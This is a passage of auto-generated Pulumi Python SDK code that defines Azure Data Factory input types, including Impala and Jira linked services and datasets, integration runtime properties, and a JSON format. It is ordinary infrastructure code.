def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The TCP port that the Impala server uses to listen for client connections. The default value is 21050.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="trustedCertPath")
def trusted_cert_path(self) -> Optional[Any]:
"""
The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
"""
return pulumi.get(self, "trusted_cert_path")
@trusted_cert_path.setter
def trusted_cert_path(self, value: Optional[Any]):
pulumi.set(self, "trusted_cert_path", value)
@property
@pulumi.getter(name="useSystemTrustStore")
def use_system_trust_store(self) -> Optional[Any]:
"""
Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
"""
return pulumi.get(self, "use_system_trust_store")
@use_system_trust_store.setter
def use_system_trust_store(self, value: Optional[Any]):
pulumi.set(self, "use_system_trust_store", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
The user name used to access the Impala server. The default value is anonymous when using SASLUsername.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class ImpalaObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Impala server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'ImpalaObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class IntegrationRuntimeComputePropertiesArgs:
def __init__(__self__, *,
location: Optional[pulumi.Input[str]] = None,
max_parallel_executions_per_node: Optional[pulumi.Input[int]] = None,
node_size: Optional[pulumi.Input[str]] = None,
number_of_nodes: Optional[pulumi.Input[int]] = None,
v_net_properties: Optional[pulumi.Input['IntegrationRuntimeVNetPropertiesArgs']] = None):
"""
The compute resource properties for managed integration runtime.
:param pulumi.Input[str] location: The location for managed integration runtime. The supported regions can be found at https://docs.microsoft.com/en-us/azure/data-factory/data-factory-data-movement-activities
:param pulumi.Input[int] max_parallel_executions_per_node: Maximum parallel executions count per node for managed integration runtime.
:param pulumi.Input[str] node_size: The node size requirement for the managed integration runtime.
:param pulumi.Input[int] number_of_nodes: The required number of nodes for managed integration runtime.
:param pulumi.Input['IntegrationRuntimeVNetPropertiesArgs'] v_net_properties: VNet properties for managed integration runtime.
"""
if location is not None:
pulumi.set(__self__, "location", location)
if max_parallel_executions_per_node is not None:
pulumi.set(__self__, "max_parallel_executions_per_node", max_parallel_executions_per_node)
if node_size is not None:
pulumi.set(__self__, "node_size", node_size)
if number_of_nodes is not None:
pulumi.set(__self__, "number_of_nodes", number_of_nodes)
if v_net_properties is not None:
pulumi.set(__self__, "v_net_properties", v_net_properties)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The location for managed integration runtime. The supported regions can be found at https://docs.microsoft.com/en-us/azure/data-factory/data-factory-data-movement-activities
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="maxParallelExecutionsPerNode")
def max_parallel_executions_per_node(self) -> Optional[pulumi.Input[int]]:
"""
Maximum parallel executions count per node for managed integration runtime.
"""
return pulumi.get(self, "max_parallel_executions_per_node")
@max_parallel_executions_per_node.setter
def max_parallel_executions_per_node(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_parallel_executions_per_node", value)
@property
@pulumi.getter(name="nodeSize")
def node_size(self) -> Optional[pulumi.Input[str]]:
"""
The node size requirement for the managed integration runtime.
"""
return pulumi.get(self, "node_size")
@node_size.setter
def node_size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "node_size", value)
@property
@pulumi.getter(name="numberOfNodes")
def number_of_nodes(self) -> Optional[pulumi.Input[int]]:
"""
The required number of nodes for managed integration runtime.
"""
return pulumi.get(self, "number_of_nodes")
@number_of_nodes.setter
def number_of_nodes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "number_of_nodes", value)
@property
@pulumi.getter(name="vNetProperties")
def v_net_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeVNetPropertiesArgs']]:
"""
VNet properties for managed integration runtime.
"""
return pulumi.get(self, "v_net_properties")
@v_net_properties.setter
def v_net_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeVNetPropertiesArgs']]):
pulumi.set(self, "v_net_properties", value)
@pulumi.input_type
class IntegrationRuntimeCustomSetupScriptPropertiesArgs:
def __init__(__self__, *,
blob_container_uri: Optional[pulumi.Input[str]] = None,
sas_token: Optional[pulumi.Input['SecureStringArgs']] = None):
"""
Custom setup script properties for a managed dedicated integration runtime.
:param pulumi.Input[str] blob_container_uri: The URI of the Azure blob container that contains the custom setup script.
:param pulumi.Input['SecureStringArgs'] sas_token: The SAS token of the Azure blob container.
"""
if blob_container_uri is not None:
pulumi.set(__self__, "blob_container_uri", blob_container_uri)
if sas_token is not None:
pulumi.set(__self__, "sas_token", sas_token)
@property
@pulumi.getter(name="blobContainerUri")
def blob_container_uri(self) -> Optional[pulumi.Input[str]]:
"""
The URI of the Azure blob container that contains the custom setup script.
"""
return pulumi.get(self, "blob_container_uri")
@blob_container_uri.setter
def blob_container_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "blob_container_uri", value)
@property
@pulumi.getter(name="sasToken")
def sas_token(self) -> Optional[pulumi.Input['SecureStringArgs']]:
"""
The SAS token of the Azure blob container.
"""
return pulumi.get(self, "sas_token")
@sas_token.setter
def sas_token(self, value: Optional[pulumi.Input['SecureStringArgs']]):
pulumi.set(self, "sas_token", value)
@pulumi.input_type
class IntegrationRuntimeDataProxyPropertiesArgs:
def __init__(__self__, *,
connect_via: Optional[pulumi.Input['EntityReferenceArgs']] = None,
path: Optional[pulumi.Input[str]] = None,
staging_linked_service: Optional[pulumi.Input['EntityReferenceArgs']] = None):
"""
Data proxy properties for a managed dedicated integration runtime.
:param pulumi.Input['EntityReferenceArgs'] connect_via: The self-hosted integration runtime reference.
:param pulumi.Input[str] path: The path to contain the staged data in the Blob storage.
:param pulumi.Input['EntityReferenceArgs'] staging_linked_service: The staging linked service reference.
"""
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if path is not None:
pulumi.set(__self__, "path", path)
if staging_linked_service is not None:
pulumi.set(__self__, "staging_linked_service", staging_linked_service)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['EntityReferenceArgs']]:
"""
The self-hosted integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['EntityReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def path(self) -> Optional[pulumi.Input[str]]:
"""
The path to contain the staged data in the Blob storage.
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "path", value)
@property
@pulumi.getter(name="stagingLinkedService")
def staging_linked_service(self) -> Optional[pulumi.Input['EntityReferenceArgs']]:
"""
The staging linked service reference.
"""
return pulumi.get(self, "staging_linked_service")
@staging_linked_service.setter
def staging_linked_service(self, value: Optional[pulumi.Input['EntityReferenceArgs']]):
pulumi.set(self, "staging_linked_service", value)
@pulumi.input_type
class IntegrationRuntimeReferenceArgs:
def __init__(__self__, *,
reference_name: pulumi.Input[str],
type: pulumi.Input[str],
parameters: Optional[pulumi.Input[Mapping[str, Any]]] = None):
"""
Integration runtime reference type.
:param pulumi.Input[str] reference_name: Reference integration runtime name.
:param pulumi.Input[str] type: Type of integration runtime.
:param pulumi.Input[Mapping[str, Any]] parameters: Arguments for integration runtime.
"""
pulumi.set(__self__, "reference_name", reference_name)
pulumi.set(__self__, "type", type)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="referenceName")
def reference_name(self) -> pulumi.Input[str]:
"""
Reference integration runtime name.
"""
return pulumi.get(self, "reference_name")
@reference_name.setter
def reference_name(self, value: pulumi.Input[str]):
pulumi.set(self, "reference_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of integration runtime.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Arguments for integration runtime.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class IntegrationRuntimeSsisCatalogInfoArgs:
def __init__(__self__, *,
catalog_admin_password: Optional[pulumi.Input['SecureStringArgs']] = None,
catalog_admin_user_name: Optional[pulumi.Input[str]] = None,
catalog_pricing_tier: Optional[pulumi.Input[str]] = None,
catalog_server_endpoint: Optional[pulumi.Input[str]] = None):
"""
Catalog information for managed dedicated integration runtime.
:param pulumi.Input['SecureStringArgs'] catalog_admin_password: The password of the administrator user account of the catalog database.
:param pulumi.Input[str] catalog_admin_user_name: The administrator user name of catalog database.
:param pulumi.Input[str] catalog_pricing_tier: The pricing tier for the catalog database. Valid values can be found at https://azure.microsoft.com/en-us/pricing/details/sql-database/
:param pulumi.Input[str] catalog_server_endpoint: The catalog database server URL.
"""
if catalog_admin_password is not None:
pulumi.set(__self__, "catalog_admin_password", catalog_admin_password)
if catalog_admin_user_name is not None:
pulumi.set(__self__, "catalog_admin_user_name", catalog_admin_user_name)
if catalog_pricing_tier is not None:
pulumi.set(__self__, "catalog_pricing_tier", catalog_pricing_tier)
if catalog_server_endpoint is not None:
pulumi.set(__self__, "catalog_server_endpoint", catalog_server_endpoint)
@property
@pulumi.getter(name="catalogAdminPassword")
def catalog_admin_password(self) -> Optional[pulumi.Input['SecureStringArgs']]:
"""
The password of the administrator user account of the catalog database.
"""
return pulumi.get(self, "catalog_admin_password")
@catalog_admin_password.setter
def catalog_admin_password(self, value: Optional[pulumi.Input['SecureStringArgs']]):
pulumi.set(self, "catalog_admin_password", value)
@property
@pulumi.getter(name="catalogAdminUserName")
def catalog_admin_user_name(self) -> Optional[pulumi.Input[str]]:
"""
The administrator user name of catalog database.
"""
return pulumi.get(self, "catalog_admin_user_name")
@catalog_admin_user_name.setter
def catalog_admin_user_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "catalog_admin_user_name", value)
@property
@pulumi.getter(name="catalogPricingTier")
def catalog_pricing_tier(self) -> Optional[pulumi.Input[str]]:
"""
The pricing tier for the catalog database. Valid values can be found at https://azure.microsoft.com/en-us/pricing/details/sql-database/
"""
return pulumi.get(self, "catalog_pricing_tier")
@catalog_pricing_tier.setter
def catalog_pricing_tier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "catalog_pricing_tier", value)
@property
@pulumi.getter(name="catalogServerEndpoint")
def catalog_server_endpoint(self) -> Optional[pulumi.Input[str]]:
"""
The catalog database server URL.
"""
return pulumi.get(self, "catalog_server_endpoint")
@catalog_server_endpoint.setter
def catalog_server_endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "catalog_server_endpoint", value)
@pulumi.input_type
class IntegrationRuntimeSsisPropertiesArgs:
def __init__(__self__, *,
catalog_info: Optional[pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs']] = None,
custom_setup_script_properties: Optional[pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs']] = None,
data_proxy_properties: Optional[pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs']] = None,
edition: Optional[pulumi.Input[str]] = None,
license_type: Optional[pulumi.Input[str]] = None):
"""
SSIS properties for managed integration runtime.
:param pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs'] catalog_info: Catalog information for managed dedicated integration runtime.
:param pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs'] custom_setup_script_properties: Custom setup script properties for a managed dedicated integration runtime.
:param pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs'] data_proxy_properties: Data proxy properties for a managed dedicated integration runtime.
:param pulumi.Input[str] edition: The edition for the SSIS Integration Runtime.
:param pulumi.Input[str] license_type: License type for the bring-your-own-license scenario.
"""
if catalog_info is not None:
pulumi.set(__self__, "catalog_info", catalog_info)
if custom_setup_script_properties is not None:
pulumi.set(__self__, "custom_setup_script_properties", custom_setup_script_properties)
if data_proxy_properties is not None:
pulumi.set(__self__, "data_proxy_properties", data_proxy_properties)
if edition is not None:
pulumi.set(__self__, "edition", edition)
if license_type is not None:
pulumi.set(__self__, "license_type", license_type)
@property
@pulumi.getter(name="catalogInfo")
def catalog_info(self) -> Optional[pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs']]:
"""
Catalog information for managed dedicated integration runtime.
"""
return pulumi.get(self, "catalog_info")
@catalog_info.setter
def catalog_info(self, value: Optional[pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs']]):
pulumi.set(self, "catalog_info", value)
@property
@pulumi.getter(name="customSetupScriptProperties")
def custom_setup_script_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs']]:
"""
Custom setup script properties for a managed dedicated integration runtime.
"""
return pulumi.get(self, "custom_setup_script_properties")
@custom_setup_script_properties.setter
def custom_setup_script_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs']]):
pulumi.set(self, "custom_setup_script_properties", value)
@property
@pulumi.getter(name="dataProxyProperties")
def data_proxy_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs']]:
"""
Data proxy properties for a managed dedicated integration runtime.
"""
return pulumi.get(self, "data_proxy_properties")
@data_proxy_properties.setter
def data_proxy_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs']]):
pulumi.set(self, "data_proxy_properties", value)
@property
@pulumi.getter
def edition(self) -> Optional[pulumi.Input[str]]:
"""
The edition for the SSIS Integration Runtime.
"""
return pulumi.get(self, "edition")
@edition.setter
def edition(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "edition", value)
@property
@pulumi.getter(name="licenseType")
def license_type(self) -> Optional[pulumi.Input[str]]:
"""
License type for the bring-your-own-license scenario.
"""
return pulumi.get(self, "license_type")
@license_type.setter
def license_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "license_type", value)
@pulumi.input_type
class IntegrationRuntimeVNetPropertiesArgs:
def __init__(__self__, *,
subnet: Optional[pulumi.Input[str]] = None,
v_net_id: Optional[pulumi.Input[str]] = None):
"""
VNet properties for managed integration runtime.
:param pulumi.Input[str] subnet: The name of the subnet this integration runtime will join.
:param pulumi.Input[str] v_net_id: The ID of the VNet that this integration runtime will join.
"""
if subnet is not None:
pulumi.set(__self__, "subnet", subnet)
if v_net_id is not None:
pulumi.set(__self__, "v_net_id", v_net_id)
@property
@pulumi.getter
def subnet(self) -> Optional[pulumi.Input[str]]:
"""
The name of the subnet this integration runtime will join.
"""
return pulumi.get(self, "subnet")
@subnet.setter
def subnet(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet", value)
@property
@pulumi.getter(name="vNetId")
def v_net_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the VNet that this integration runtime will join.
"""
return pulumi.get(self, "v_net_id")
@v_net_id.setter
def v_net_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "v_net_id", value)
@pulumi.input_type
class JiraLinkedServiceArgs:
def __init__(__self__, *,
host: Any,
type: pulumi.Input[str],
username: Any,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Jira Service linked service.
:param Any host: The IP address or host name of the Jira service. (e.g. jira.example.com)
:param pulumi.Input[str] type: Type of linked service.
:param Any username: The user name that you use to access the Jira service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password corresponding to the user name that you provided in the username field.
:param Any port: The TCP port that the Jira server uses to listen for client connections. The default value is 443 if connecting through HTTPS, or 8080 if connecting through HTTP.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'Jira')
pulumi.set(__self__, "username", username)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter
def host(self) -> Any:
"""
The IP address or host name of the Jira service. (e.g. jira.example.com)
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def username(self) -> Any:
"""
The user name that you use to access the Jira service.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Any):
pulumi.set(self, "username", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password corresponding to the user name that you provided in the username field.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The TCP port that the Jira server uses to listen for client connections. The default value is 443 if connecting through HTTPS, or 8080 if connecting through HTTP.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class JiraObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Jira Service dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'JiraObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class JsonFormatArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
deserializer: Optional[Any] = None,
encoding_name: Optional[Any] = None,
file_pattern: Optional[pulumi.Input[str]] = None,
json_node_reference: Optional[Any] = None,
json_path_definition: Optional[Any] = None,
nesting_separator: Optional[Any] = None,
serializer: Optional[Any] = None):
"""
The data stored in JSON format.
:param pulumi.Input[str] type: Type of dataset storage format.
:param Any deserializer: Deserializer. Type: string (or Expression with resultType string).
:param Any encoding_name: The code page name of the preferred encoding. If not provided, the default value is 'utf-8', unless the byte order mark (BOM) denotes another Unicode encoding. The full list of supported values can be found in the 'Name' column of the table of encodings in the following reference: https://go.microsoft.com/fwlink/?linkid=861078. Type: string (or Expression with resultType string).
:param pulumi.Input[str] file_pattern: File pattern of JSON, i.e. the way a collection of JSON objects is separated. The default value is 'setOfObjects'. It is case-sensitive.
:param Any json_node_reference: The JSONPath of the JSON array element to be flattened. Example: "$.ArrayPath". Type: string (or Expression with resultType string).
:param Any json_path_definition: The JSONPath definition for each column mapping with a customized column name to extract data from JSON file. For fields under root object, start with "$"; for fields inside the array chosen by jsonNodeReference property, start from the array element. Example: {"Column1": "$.Column1Path", "Column2": "Column2PathInArray"}. Type: object (or Expression with resultType object).
:param Any nesting_separator: The character used to separate nesting levels. Default value is '.' (dot). Type: string (or Expression with resultType string).
:param Any serializer: Serializer. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "type", 'JsonFormat')
if deserializer is not None:
pulumi.set(__self__, "deserializer", deserializer)
if encoding_name is not None:
pulumi.set(__self__, "encoding_name", encoding_name)
if file_pattern is not None:
pulumi.set(__self__, "file_pattern", file_pattern)
if json_node_reference is not None:
pulumi.set(__self__, "json_node_reference", json_node_reference)
if json_path_definition is not None:
pulumi.set(__self__, "json_path_definition", json_path_definition)
if nesting_separator is not None:
pulumi.set(__self__, "nesting_separator", nesting_separator)
if serializer is not None:
pulumi.set(__self__, "serializer", serializer)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset storage format.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def deserializer(self) -> Optional[Any]:
"""
Deserializer. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "deserializer")
@deserializer.setter
def deserializer(self, value: Optional[Any]):
